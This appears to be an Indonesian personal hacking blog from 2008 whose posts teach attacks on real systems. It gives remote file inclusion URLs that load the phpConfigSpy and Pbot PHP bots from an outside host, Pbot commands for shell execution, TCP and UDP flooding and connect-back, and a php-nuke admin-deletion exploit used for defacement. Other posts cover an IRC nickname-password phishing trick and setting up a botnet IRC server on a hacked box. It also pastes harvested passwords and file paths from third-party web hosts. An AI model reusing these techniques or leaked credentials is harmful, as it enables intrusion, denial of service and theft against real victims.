Setelah Di ajarkan di banned

Posted in Irc on March 10, 2008 by Furkan

Eh.. Sulit Untuk mempercayai para bule, maunya enak sendiri, udah dapat source code malah asik dengan codenya. yang ngasih sourcenya malah di cuekin hiks..

<Pig> [automated msg] Please standby for acknowledgement. I am using a secure query event. You will be notified if accepted. Until then your msgs will be ignored.
<Pig> [automated msg] Query request accepted.
<Pig> yes
<Shinchi> wiw
<Shinchi> how r u bro
<Pig> tell me
<Pig> fine
<Shinchi> :)
<Pig> tell me Shinchi what are u doing here ?
<Shinchi> iam need source ircd bro
<Pig> wait
<Shinchi> and teachme how to load ircd
<Pig> http://www.freewebtown.com/bruxelles/stoneys-unreal.tar.gz
<Pig> how to load is not hard
<Pig> just type in google
<Shinchi> yup
<Pig> wget http://pr0be.net/ircd.tar.gz
<Pig> STEP 2 STEP 2 STEP 2 STEP 2 STEP 2 STEP 2 STEP 2 STEP 2
<Pig> ################################################################################
<Pig> You will start seeing a bar move across your screen that indicates it is being #
<Pig> downloaded…. Just wait for it to finish, and then type this to decompress it #
<Pig> ################################################################################
<Pig> tar -zxvf ircd.tar.gz
<Pig> STEP 3 STEP 3 STEP 3 STEP 3 STEP 3 STEP 3 STEP 3 STEP 3
<Pig> #################################################################################
<Pig> You will see it unzip itself. All files will be unzipped into a directory called#
<Pig> Unreal3.2 …. Once it is finished unzipping, type this to change directories to#
<Pig> the ircd #
<Pig> #################################################################################
<Pig> cd Unreal3.2
<Pig> STEP 4 STEP 4 STEP 4 STEP 4 STEP 4 STEP 4 STEP 4 STEP 4
<Pig> ##################################################################################
<Pig> Alright, good.. So far we have gotten the ircd and unzipped it. Time to configure#
<Pig> our ircd. Now keep in mind your situation may be different, But for the most part#
<Pig> all the options i select will work for you, hopefully. It helps to read, instead #
<Pig> of press enter though. #
<Pig> ##################################################################################
<Pig> ./Config
<Pig> #################################################################################################################################
<Pig> #
<Pig> You will now see a whole bunch of information about unreal IRCD. #
<Pig> Just press enter until you see the config ask you the question: #
<Pig> ######################################################################################### #
<Pig> For the most part, you can just hit enter, but if you have a question refer back here # #
<Pig> ######################################################################################### #
<Pig> Do you want to enable the server anti-spoof protection? #
<Pig> #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> Do you want to enable the server anti-spoof protection? #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> What directory are all the server configuration files in? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> What is the path to the IRCD binary including the name of the binary? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> Would you like to compile as a hub or as a leaf? #
<Pig> #
<Pig> #
<Pig> Type LEAF #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> What is the hostname of the server running your IRCD? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> What should the default permissions for your configuration files be? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> Do you want to support SSL (Secure Sockets Layer) connections? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> Do you want to enable IPv6 support? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> Do you want to enable ziplinks support? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> Do you want to enable remote includes? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> Do you want to enable prefixes for chanadmin and chanowner? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> What listen() backlog value do you wish to use? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> How far back do you want to keep the nickname history? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> What is the maximum sendq length you wish to have? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> How many buffer pools would you like? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> How many file descriptors (or sockets) can the IRCD use? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> To the question: #
<Pig> #
<Pig> Would you like any more parameters to configure? #
<Pig> #
<Pig> #
<Pig> Just press enter #
<Pig> #
<Pig> #################################################################################################################################
<Pig> STEP 5 STEP 5 STEP 5 STEP 5 STEP 5 STEP 5
<Pig> ###################################################
<Pig> Now the script will begin confiruing your files #
<Pig> The next step is to type this : #
<Pig> ###################################################
<Pig> make
<Pig> STEP 6 STEP 6 STEP 6 STEP 6 STEP 6 STEP 6
<Pig> #####################################################################################################
<Pig> Now it is making the binaries…. once its done, Its time to edit the config file for your settings #
<Pig> #
<Pig> You can either edit it in ssh (which is a pain in the ass, but somewhat time consuming) OR you can #
<Pig> Edit the config on your computer if you have ftp along with your ssh.. here i will edit it in ssh #
<Pig> #####################################################################################################
<Pig> Now to make sure your in the right directory, type:
<Pig> ls
<Pig> You should see a bunch of files, and one called “unrealircd.conf”.
<Pig> Now to edit it, type:
<Pig> nano unrealircd.conf
<Pig> Now lets edit the settings
<Pig> # ########################################
<Pig> # # ME Block #
<Pig> # ########################################
<Pig> me {
<Pig> name “irc.yourdomain.com”; // your domain, obviously. i wouldn’t use irc.yourdomain though
<Pig> info “M0dded IRC Network”; // your network name. you can use some ~censored~
<Pig> numeric 1; // you can leave this alone
<Pig> };
<Pig> Skip down until you see this :
<Pig> # ########################################
<Pig> # # Listen Block #
<Pig> # ########################################
<Pig> listen *:6667; // Change this to your port. i wouldn’t do default, use some oddball port. harder to find your ircd
<Pig> Next in line, you should see this
<Pig> # ########################################
<Pig> # # Operator Block #
<Pig> # ########################################
<Pig> oper Username {
<Pig> class clients;
<Pig> from {
<Pig> userhost *@*;
<Pig> };
<Pig> password “haxor”; // change this to your password, youll oper up using /oper Username yourpass
<Pig> flags
<Pig> {
<Pig> global;
<Pig> services-admin;
<Pig> can_rehash;
<Pig> can_die;
<Pig> can_restart;
<Pig> helpop;
<Pig> can_wallops;
<Pig> can_globops;
<Pig> can_localroute;
<Pig> can_globalroute;
<Pig> can_localkill;
<Pig> can_globalkill;
<Pig> can_kline;
<Pig> can_gzline;
<Pig> can_gkline;
<Pig> can_unkline;
<Pig> can_localnotice;
<Pig> can_globalnotice;
<Pig> netadmin;
<Pig> can_zline;
<Pig> get_umodew;
<Pig> get_host;
<Pig> can_override;
<Pig> };
<Pig> snomask *;
<Pig> maxlogins “2″; // the max people you will have opered at one time. i’d keep it at 2-3 unless you have more friends
<Pig> };
<Pig> Now heres a big part of your config file… Make sure you fill out everything correctly.
<Pig> # ########################################
<Pig> # # Settings #
<Pig> # ########################################
<Pig> drpass {
<Pig> restart “yourpassword”;
<Pig> die “yourpassword”;
<Pig> };
<Pig> set {
<Pig> network-name “yourdomain.com”; // yourdomain.com, obviously
<Pig> default-server “irc.yourdomain.com”; // your irc.. again i wouldn’t use irc.yourdomain.com… use hax.yourdomain.com
<Pig> services-server “yourdomain.com”; // or something like that.
<Pig> help-channel “#lobby”; // the default channel
<Pig> hiddenhost-prefix “fbi”;
<Pig> cloak-keys {
<Pig> “2299c3d82bb46632e3ecd35e8c19ad01″; // you can use theese, dont really mean anything
<Pig> “d6f3bf0417228f22ad84c2fd40151e26″;
<Pig> “514875babec705702260bdd911811333″;
<Pig> };
<Pig> hosts {
<Pig> local “fbi.gov”; // this section is going to be your vhost.
<Pig> global “fbi.gov”; //set it to whatever your bot source looks for (fbi.gov by default)
<Pig> coadmin “fbi.gov”;
<Pig> admin “fbi.gov”;
<Pig> netadmin “fbi.gov”;
<Pig> servicesadmin “fbi.gov”;
<Pig> host-on-oper-up “yes”;
<Pig> };
<Pig> };
<Pig> set {
<Pig> allowed-nickchars {
<Pig> latin1;
<Pig> };
<Pig> kline-address “kline@yourdomain.com”; // change it to kline@yourdomain.com .
<Pig> modes-on-connect “+xwGi”;
<Pig> modes-on-oper “+xwgspH”;
<Pig> restrict-usermodes “G”;
<Pig> restrict-channelmodes “G”;
<Pig> modes-on-join “+nust”; // theese are the modes on join of a channel. i’d leave them the way they are
<Pig> oper-auto-join “#admins”;
<Pig> dns {
<Pig> nameserver your.ip.goes.here; // here is where you have to put your i.p that your binding to
<Pig> timeout 2s; // … you can get it by pinging what you logged into ssh with
<Pig> retries 2;
<Pig> }; // the rest of this section you can leave it as it is.
<Pig> options {
<Pig> hide-ulines;
<Pig> show-connect-info;
<Pig> show-opermotd;
<Pig> allow-part-if-shunned;
<Pig> flat-map;
<Pig> fail-oper-warn;
<Pig> };
<Pig> maxchannelsperuser 30;
<Pig> anti-spam-quit-message-time 100s;
<Pig> static-quit “1337 h4xs”;
<Pig> oper-only-stats “*”;
<Pig> throttle {
<Pig> connections 3;
<Pig> period 60s;
<Pig> };
<Pig> anti-flood {
<Pig> nick-flood 50:60;
<Pig> };
<Pig> spamfilter {
<Pig> ban-time 1d;
<Pig> ban-reason “Spam/Advertising”;
<Pig> virus-help-channel “#help”;
<Pig> };
<Pig> default-bantime “0″;
<Pig> };
<Pig> Now you have one more block to configure, And your done.
<Pig> Scroll down to
<Pig> # ########################################
<Pig> # # ~censored~ ~censored~ Block (NOT NEEDED :D) #
<Pig> # ########################################
<Pig> ban nick {
<Pig> mask “*S*e*r*v*”;
<Pig> reason “Gesperrt”;
<Pig> };
<Pig> ulines {
<Pig> services.yourdomain.com; // change this to your domain
<Pig> stats.yourdomain.com; // and your domain again.
<Pig> };
<Pig> tld {
<Pig> mask *@*;
<Pig> motd “motd.conf”;
<Pig> rules “rules.conf”;
<Pig> };
<Pig> Now hit Control-X at the same time, hit Y and then hit enter
<Pig> ###############################################################
<Pig> Congratulations, You have successfully configured your ircd. #
<Pig> That was easy, Wasn’t it? Alright, Now lets get it running and#
<Pig> connect to it :) Type the following : #
<Pig> ###############################################################
<Pig> ./unreal start
<Pig> It should start with no problem… If it shows an error, Just go back
<Pig> and make sure you followed the steps correctly.
<Pig> Now its time to set the DNS on your irc. If you have a domain, All you have to do
<Pig> is set the a record for your subdomain to the i.p of your ircd. If you dont have
<Pig> WHM or something similar, sign up for:
<Pig> an account at www.zoneedit.com or
<Pig> www.dnsexit.com
<Pig> ( both sites are free to use )
<Pig> Once your DNS resolves, You can connect to
<Pig> Or, if you absoloutly can’t wait
<Pig> now save all this
<Pig> and if u want to talk me do it in indoirc
<Pig> not here because this is not public server oki Shinchi ?
<Pig> http://unkn0wn.eu/board/viewtopic.php?t=12419&highlight=ircd
<Pig> go here also
<Pig> and learn how to install ircd
<Pig> in hacked box
<Pig> oki ?
<Shinchi> wow
<Shinchi> yess
<Shinchi> thx bro
<Pig> oki now leave from here and if u want help again i am in #donatcrew chanel
<Pig> in indoirc
<Pig> oki ?
<Shinchi> ok
<Shinchi> yes bro

* Connecting to 61.246.177.225 (65500)
-
-irc.Indonesia.B0tN3t.org- *** Looking up your hostname…
-
-irc.Indonesia.B0tN3t.org- *** Found your hostname
-
-irc.Indonesia.B0tN3t.org- *** If you are having problems connecting due to ping timeouts, please type /quote pong 183864A5 or /raw pong 183864A5 now.
-
irc.Indonesia.B0tN3t.org 001 Shinchi
M0dded by uNkn0wn Crew
irc.Indonesia.B0tN3t.org 003 Shinchi
-
www.uNkn0wn.eu - iD@uNkn0wn.eu
-
MOTD File is missing
-
* Shinchi sets mode: +iwx
-
Local host: host-216-153-128-101.roc.choiceone.net (216.153.128.101)
-
-> *pig* bro
-
-> *Fr0zen* bro
-
Fr0zen No such nick/channel
-
-irc.Indonesia.B0tN3t.org- *** You are permanently banned from Indonesia.B0tN3t (to me in indoirc not here lol)
-
Closing Link: Shinchi[host-216-153-128-101.roc.choiceone.net] (User has been permanently banned from Indonesia.B0tN3t (to me in indoirc not here lol))
-

Mengetahui alamat IP dari sebuah Url

Posted in Cuap-Cuap, belajar on February 14, 2008 by Furkan

Untuk mengetahui IP ataupun alamat target dapat di cek dengan Mirc, caranya :
yang pertama ya harus  jalankan dulu mirc, maksudnya di buka program mircnya.
kedua, lihat pada statusnya atau jendela status mirc.
selanjutnya ketik pada statusnya:
/dns Web/IP

contohnya :
saat memasukkan perintah :
/dns google.com
maka akan keluar tampilan pada status mirc.
* Dns resolving google.com
-
* Dns resolved google.com to 64.233.167.99

dan kalau ingin tau lagi ketik /dns 64.233.167.99 maka akan mendapatkan
* Dns resolved 64.233.167.99 to py-in-f99.google.com

Itu artinya dapat meresolve ip dari google.com dan itu adalah ip dari google. Untuk mencek lagi alamat IP dapat juga di gunakan cmd atau command pada windows, dengan cara :
Start => run => ketik “cmd”
atau
Start => Programs => Accesaories => Command Prompt

setelah masuk jendela command tinggal ketik :
ping alamaturl

contoh :
ping shinchi-cakep.com

hasilnya :
C:\>ping shinchi-cakep.com

Pinging shinchi-cakep.com [209.62.20.175] with 32 bytes of data:

Reply from 209.62.20.175: bytes=32 time=355ms TTL=46
Reply from 209.62.20.175: bytes=32 time=318ms TTL=46
Reply from 209.62.20.175: bytes=32 time=370ms TTL=46
Reply from 209.62.20.175: bytes=32 time=305ms TTL=46

Ping statistics for 209.62.20.175:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 305ms, Maximum = 370ms, Average = 337ms

kalau pada linux tinggal mengetikan perintah terminal atau shell :
/sbin/ifconfig | grep inet

jadi deh :D
Belajar lagi ach… mayan banyak dapat infomasi dari kk di Irc :D

Mencari phpConfigSpy dengan mesin pencari

Posted in Cuap-Cuap, belajar on February 14, 2008 by Furkan

Dengan Bantuan search engini, kita di mudahkan dalam bekerja, mencari data ataupun mencari hal-hal yang mungkin pribadi, seperti contohnya saja adalah username dan password.

Di sengaja ataupun tidak di sengaja, bot google telah mendapatkannya. Dengan dork atau kata kunci untuk pencarian di google dapat dengan mudah kita temukan “phpConfigSpy” yang di simpan orang-orang “nakal” untuk mengetahui atau untuk mempermudah pencarian username dan password untuk login ssh,cpanel ataupun mysql.

Dengan Menuliskan “phpConfigSpy” kita akan mendapatkan file tersebut, seperti yang telah di dapatkan di bawah ini, dan juga dengan memasukkan dork :
intitle:phpConfigSpy
kita bisa mendapatkan username serta password.

Di bawah ini adalah data-data yang telah saya dapatkan dengan menggunakan Google.com

source phpconfigspy
http://www.ponpes.com/phpconfig.txt

http://pwp-northside.org/tool.php
[+] /home/darrell/public_html/gallery/include/config.inc.php
‘millencolin69

http://stocks50sixpac.com/calendar/events/index.php

[+] Founded 52 entrys in /etc/passwd
[+] Founded 52 readable public_html directories
[~] Searching for passwords in config files…

[+] /home/stocks50/public_html/menu/config.inc.php
johns07
[+] /home/carmens/public_html/config.inc.php
tirechange07
[+] /home/sassys/public_html/menu/config.inc.php
plane07ss
[+] /home/littlea/public_html/menu/config.inc.php
tt07la
[+] /home/otp/public_html/menu/config.inc.php
sfranklin07
[+] /home/yp/public_html/menu/config.inc.php
sandy07yp
[+] /home/limited/public_html/mailing-manager/index.php
password
[+] /home/jpl/public_html/guestbook/index.php
PassMess1
[+] /home/jpl/public_html/guestbook/admin/config.inc.php
7QYM50KpT7
[+] /home/tncs/public_html/menu/config.inc.php
ct07tnc
[+] /home/corners/public_html/menu/config.inc.php
daveh07
[+] /home/corners/public_html/mailing-manager/index.php
password
[+] /home/orchard/public_html/menu/config.inc.php
daved071
[+] /home/bistro/public_html/menu/config.inc.php
tom2007
[+] /home/bistro/public_html/config.inc.php
tom2007
[+] /home/ohio/public_html/menu/config.inc.php
osl07
[+] /home/anthonys/public_html/menu/config.inc.php
rizzo07af
[+] /home/morris/public_html/menu/config.inc.php
morris07kk
[+] /home/francosj/public_html/menu/config.inc.php
frankos07ps
[+] /home/phoenix/public_html/menu/config.inc.php
dspt07

[+] Done

http://dolhost.us/pbliga/info.php
dolhost.us to 208.68.174.90

[+] Founded 90 entrys in /etc/passwd
[+] Founded 90 readable public_html directories
[~] Searching for passwords in config.* files…

[+] /home/pbligac/public_html/wales/album/config/config.php
Absolute path to directory where password file and album index are located (no trailing slash
[+] /home/pbligac/public_html/gazeta/datas/config.php
ufptnf
[+] /home/pbligac/public_html/pa/config.inc.php
The ‘cookie
[+] /home/croatia/public_html/includes/data/config.php
gAS48srI
[+] /home/croatia/public_html/includes/db.php
ew sql_db($dbhost, $dbuname, $dbpass, $dbname, f
[+] /home/estonia/public_html/votingpoll/config.php
jy4bqm
[+] /home/georgia/public_html/photo/config/config.php
DAlbum password control security of folders onl
[+] /home/minskcup/public_html/abelevich/connect.php
ysql_connect (”localhost”, “minskcup_toto”, “password
[+] /home/minskcup/public_html/abelevich/test/connect.php
ysql_connect (”localhost”, “minskcup_toto”, “password
[+] /home/minskcup/public_html/gif/abelevich/connect.php
ysql_connect (”localhost”, “minskcup_toto”, “password
[+] /home/minskcup/public_html/photo/config/config.php
Absolute path to directory where password file and album index are located (no trailing slash
[+] /home/rabotnic/public_html/config/config.php
cb4XNV78
[+] /home/slovenia/public_html/config.php
bpass: SQL Passwo
[+] /home/slovenia/public_html/db/db.php
ew sql_db($dbhost, $dbuname, $dbpass, $dbname, f
[+] /home/rustemga/public_html/admin/config.php
ustem06
[+] /home/clubonly/public_html/admin/config.php
luboy
[+] /home/moectrid/public_html/design0/admin/config.php
dmin
[+] /home/moectrid/public_html/admin/config.php
dmin
[+] /home/lyudmila/public_html/admin/config.php
leg
[+] /home/edbergma/public_html/config/config.inc.php
‘T3b5qPxt
[+] /home/edbergma/public_html/pres/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/edbergma/public_html/pdf/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/r2650066/public_html/include/config.php
U6Lsj196h3
[+] /home/r2650066/public_html/include/classes/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/lindenfl/public_html/include/config.php
GnHR8FdT
[+] /home/lindenfl/public_html/include/classes/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/dolinvoi/public_html/include/config.php
Y47Lhp6B
[FTP] dolinvoi:Y47LhXXX Success
[+] /home/dolinvoi/public_html/include/classes/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/voyager7/public_html/include/config.php
R7wwFfer
[+] /home/voyager7/public_html/include/classes/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/bigapple/public_html/include/config.php
4xEJ9TaV
[+] /home/bigapple/public_html/include/classes/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/glavsco/public_html/admin/include/config.inc.php
nj6Gts;L87t
[+] /home/glavsco/public_html/include/config.inc.php
nj6Gts;L87t

[+] Done

Saya sebenarnya binggung nama username dan mana password.
Kalaupun ada yang baca ini, mohon tambahan ataupun koreksi .

Saya cuma chatter, yang ingin tahu banyak hal :D

Menggunakan phpConfigSpy v0.2 pada target RFI

Posted in Cuap-Cuap, belajar on February 9, 2008 by Furkan

Menggunakan phpConfigSpy v0.2 pada target RFI

phpConfigSpy v0.2 Merupakan sebuah code php yang di gunakan untuk melihat file :

config.php
config.inc.php
conf.php
settings.php
setup.php
dbconf.php
dbconfig.php
db.inc.php
dbconnect.php
connect.php
index.php
common.php
config_global.php
db.php
connect.inc.php
dbconnect.inc.php

Dan untuk membaca isi file-file tersebut, untuk mendapatkan username dan password untuk login. Baik untuk Login ftp, ssh, Cpanel dan mysql.

Apabila phpConfigSpy mendapatkan sebuah file di atas atau lebih akan menghasilkan :

[+] Founded 53 entrys in /etc/passwd
[+] Founded 53 readable public_html directories
[~] Searching for passwords in config files…

[+] /home/chokbd/public_html/phpsql/config.inc.php
mysql/user
seperti pada gambar di bawah ini :
Menggunakan phpConfigSpy v0.2
Ada 2 cara untuk menggunakan phpConfigSpy yaitu :

1. Injectkan Langsung.
Dimana inject-kan langsung ini seperti melakukan inject-kan biasa seperti halnya meload botphp ataupun Pbot.

www.target-di.biz/aframe.php?page=http:/inject-an-di.biz/php/phpspy.txt??

Target Vuln/Bug Inject-kan

2. Upload phpConfigSpy di target.
Langsung saja upload file phpConfigSpy di target. asalkan filenya ber-ekstensi .php langsung dapat di gunakan dengan langsung membuka file yang di upload tadi.
Tinggal membuka di browser ww.target-di.biz/files/spy.php
bila sudah di buka tinggal tunggu prosesnya saja, dan lihat hasilnya.

Bila phpConfigSpy masih ber-ekstense .txt di ubah menjadi .php. dan di buka dengan browser seperti cara di atas. file yang bernama spy.php adalah file phpConfigSpy.

untuk source code nya dapat di lihat di :
Source Code phpConfigSpy v0.2

Makasih Banget untuk kk :
noname untuk source code dan penjelasannya ^_^
DonaTTeLo untuk target dan injekannya

By : Shinchi di www.samada.wordpress.com dengan Nama file asli :
Menggunakan phpConfigSpy v0.2

Pengalaman adalah guru yang terbaik

Posted in Irc, belajar on February 1, 2008 by Furkan
Tanpa sebuah pengalaman, kita tidak akan tahu, apa sebenarnya yang ada, dan apa sebenarnya yang tidak ada. Yang setiap orang tau pengalaman adalah guru yang terbaik, itulah adanya, karena tanpa pengalaman dan adanya pengalaman kita akan tahu dan mengerti langkah-langkah ataupun cara yang akan di ambil untuk kebaikan dari kita sendiri.

Disini furkan ingin bagi-bagi pengalaman, yang baru saja furkan alami sendiri. Dimana furkan dikirimkan sebuah pesan yang berisi :

Your Nick Shinchi Has Been Temporary Halted due to miss use from your nick, if you are the owner of this nick type /msg DALMessage NickServ@DAL.net Release Shinchi <Password>. You Have JusT 3 min. otherwise The nickname Shinchi is frozen and cannot be used.

Pesan itu di kirimkan lewat notice. notice itu sendiri di kirim dengan perintah :
/notice <nick> pesan

Notice Nick untuk dapatkan password

pesan yang furkan terima :
-DALMessage- Your Nick Shinchi Has Been Temporary Halted due to miss use from your nick, if you are the owner of this nick type /msg DALMessage NickServ@DAL.net Release Shinchi <Password>. You Have JusT 3 min. otherwise The nickname Shinchi is frozen and cannot be used.

pesan itu furkan terima sebanyak 4 kali.  saat lihat pesan itu di status dalnet, kirain nicknya di frozen, dan langsung saja deh kupies tulisannya :

 /msg DALMessage NickServ@DAL.net Release Shinchi password

dan masukkan passwordnya kemudian kirim. tapi saat di kirim ada balasan dari sana.

-> *DALMessage* NickServ@DAL.net Release Shinchi passwordshinchi

DALMessage is away: auto-away after 15 minutes [6m 29s]
-
-DALMessage- (X) I’m away right now - auto-away after 15 minutes -

saat itu ada nick yang naik jadi OP di channel #mataram dan saat di berikan perintah :
/cs why asalbanget #mataram
kemudian keluar pesan di status
-ChanServ- You must be an AOp on #mataram to perform this command.

nah saat itu sayapun heran, ko bisa gk ada akses Aop, Dalam hati saya “sayakan Sop, ko nggak bisa yah”

saat memasukkan perintah:
/ns info DALMessage
Pada status dalnet di dapatkan :

-NickServ- Info for DALMessage:
-
-NickServ- (Currently on IRC) For extra info: /whois DALMessage
-
-NickServ- Last seen address : ~master@c4.c7.5d45.static.theplanet.com
-
-NickServ- Last seen time    : Fri 01-Feb-2008 16:48:40 UTC
-
-NickServ- Time registered   : Thu 31-Jan-2008 13:41:28 UTC
-
-NickServ- Time now          : Fri 01-Feb-2008 16:57:09 UTC
-
-NickServ- *** End of Info ***

dan kemudian furkan coba untuk info Shinchi dan hasil yang di dapatkan adalah :

-NickServ- Info for Shinchi:
-
-NickServ- Last seen address : ~master@c4.c7.5d45.static.theplanet.com
-
-NickServ- Last seen time    : Fri 01-Feb-2008 14:50:48 UTC
-
-NickServ- Time registered   : Thu 07-Jun-2007 15:24:33 UTC
-
-NickServ- Time now          : Fri 01-Feb-2008 14:52:09 UTC
-
-NickServ- URL               : http://ketahuan.blogspot.com
-
-NickServ- Options: Enforced, NoMemo
-
-NickServ- *** End of Info ***

Dan saat di whois nick DALMessage
Pesan pada status Mirc:
DALMessage No such nick/channel
-
DALMessage End of /WHOIS list.

Nahh lohhh udah ketahuan.. udahh ada yang kerjaian saya. dan saat itu langsung deh identify ulang dan peran di statusnya :

Dan saat itu bagi saia ada pengalaman baru dan juga langsung deh cobain cara yang di lakukan  DALMessage tadi )

Dan mohon maaf untuk kk anca karena saia udah jadikan kk anca bahan percobaan juga D
Dan sampai-sampai kk anca ganti nick untuk pastiin nicknya di frozen atau gk D
* anca- is now known as sasuke-
* sasuke- is now known as anca-
* +anca- aman kirain uda ke frozen

Maap yah kk anca ) saya cuma penasaran ajah D dan taunya perhasil D

ambil hikmahnya yach.. dan cobalah praktekkan.

Waspadalah Waspadalah.. dan Telitilah

Menjalankan Botphp Pbot

Posted in Bot, belajar with tags , on January 31, 2008 by Furkan

Menjalankan Botphp Pbot
Pbot Adalah botphp, yang saat ini banyak sekali yang menggunakan Pbot ini, selain gampang penggunaannya dan juga lumayan lengkap perintah-perintah di dalamnya, di bandingkan dengan botphp yang lain.
Pbot Php For Botscan

Pbot saat menjalankan perintah.

Command Pbot :

.user <password> //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail <to> <from> <subject> <msg> //send an email
.dns <IP|HOST> //dns lookup
.download <URL> <filename> //download a file
.exec <cmd> // uses exec() //execute a command
.sexec <cmd> // uses shell_exec() //execute a command
.cmd <cmd> // uses popen() //execute a command
.info //get system information
.php <php code> // uses eval() //execute php code
.tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
.udpflood <target> <packets> <packetsize> <delay> //udpflood attack
.raw <cmd> //raw IRC command
.rndnick //change nickname
.pscan <host> <port> //port scan
.safe // test safe_mode (dvl)
.inbox <to> // test inbox (dvl)
.conback <ip> <port> // conect back (dvl)
.uname // return shell’s uname using a php function (dvl)

Log Chat Saat Menjalankan Perintah :

.sexec net user Administrator shinchi
.sexec net user
Administrator
.sexec net user

Penjelasan Perintah Di atas :

net user Administrator shinchi <- Mengganti password Administrator menjadi shinchi
net user Administrator <- Melihat status Administrator
net user <- Melihat User yang memiliki Akses pada komputer.

Cara Menjalankan Pbot :

Seperti Kebanyakan botphp, Pbot juga di jalankan dengan cara menginjekan source code dari Pbot ke target.

Seperti contoh :

Target Vuln Pbot

www.target.com/page?body=http://host.kamu/filepbot.txt?
Ada 2 macam cara Meng-inject dengan Pbot :

1. Inject langsung.

2. Botscan

1. Inject Langsung :

Dimana Target Vuln Pbot Di inject-kan langsung, sehingga menjadi seperti injectkan biasa, dan juga membutuhkan kesabaran, jikalau targetnya tidak dapat menjalankan Pbot.

2. Botscan.

Yaitu Dengan manambahkan atau mengganti cmd botscan menjadi file Pbot, sehingga Botscan yang melakukan Scan terhadap bug jika mendapatkan target, akan langsung di inject dengan file Pbot tadi.

Pbot, Bagus di jalankan pada server windows, soalna rata2 target yang bersafe mode ON dapat di gunakan untuk meload Pbot.

Kalau ada target yang bersafe mode OFF untuk apa meload Pbot, mending Load Botscan saja kan.

source code pbot :

souce di atas adalah pbot yang di gunakan di server dalnet, sedangkan yang di bawah ini adalah source Pbot yang di server indoirc.

Souce code Pbot :
Source Pbot

Tulisan ini Juga Di posting di : www.samada.wordpress.com

Belajar deface php-nuke ver lama

Posted in belajar on January 21, 2008 by Furkan

Deface kalau nggak salah tuh berarti merubah tampilan halaman web atau website.

saat itu ada seseorang yang ngajarin dan sampai sekarang orang itu tidak bakalan saia lupakan. :)
nicknya FooPunk dan saat itu langsung praktek hehe.. asikna di ajarin……

sebenarnya saia bukan apa-apa, saya cuma seorang yang suka dengan chatting dan intinya ngak terlalu ngerti dengan yang namanya komputer, dan komputer aja belum ada :)

untuk dapatin target untuk deface, saat itu dengan memasukkan kata di google seartch :

“html/php-nuke/admin.php” atau “intitle:Administration Menu”

dulu sih banyak banget, saat itu saia kelas 3 SMK, dan sekarang udah jarang, atau mungkin nggak ada.

target di bawah ini, adalah bekas bekas dari SMK dulu. sekitar kurang lebih udah 3 tahun.

gambar di bawah ini adalah tampilan awal dari panel admin dengan url:
www.target.com/html/admin.php
Belajar deface php-nuke ver lama

adapun bug dari php-nuke ini :

cara menggunakannya :

untuk menghapus user admin :
admin.php?op=deladmin2&del_aid=Webmaster

Webmaster adalah user Admin

untuk menghapusnya tinggal tambahkan baris ?op=deladmin2&del_aid=Webmaster
nanti Webmaster akan langsung di hapus dari list admin php-nuke

sehingga akan menjadi :

www.target.com/html/admin.php?op=deladmin2&del_aid=Webmaster

di bawah ini adalah gambar tampilan panel admin php-nuke, nggak tau sih apaan tuch bahasanya.

Belajar deface php-nuke ver lama 2

dan di bawah ini adalah panel configure

Belajar deface php-nuke ver lama 3

Sebuah Gambar Yang penuh dengan Kenangan

Posted in Kenangan on January 13, 2008 by Furkan


Sebuah Gambar Yang penuh dengan Kenangan

Kenangan Masa Sekolah

Posted in Kenangan on January 13, 2008 by Furkan

Gambar Yang penuh dengan kanangan Saat Sekolah Dulu, Yang Selalu Menemani Saat Dalam Kamar, Sambil Mendengarkan Musik Dan sambil membaca.

Sebuah Gambar yang slalu Di pajang di atas dinding.

Imuttttnyaaa……..

Apapun kata orang.. ya itu tetap imut, walau orang-orang bertaka.. “Itukan Hanya Sebuah Gambar”. Saya berkata “Dalam gambar tersimpan sebuah makna”.

Sulit di ungkapkan dengan kata.

Bayangkan..
Bayangkan Sesuatu yang tak pernah di bayangkan orang lain.

Kata-kata itu dari dulu teruss ada.. Sampai sampai… menjadi.
Ketika rasa tak dapat di ungkap dengan kata.

begitulah keadaannya…

Blog pertama Dengan nama Shinchi Loh

Posted in Cuap-Cuap on January 12, 2008 by Furkan

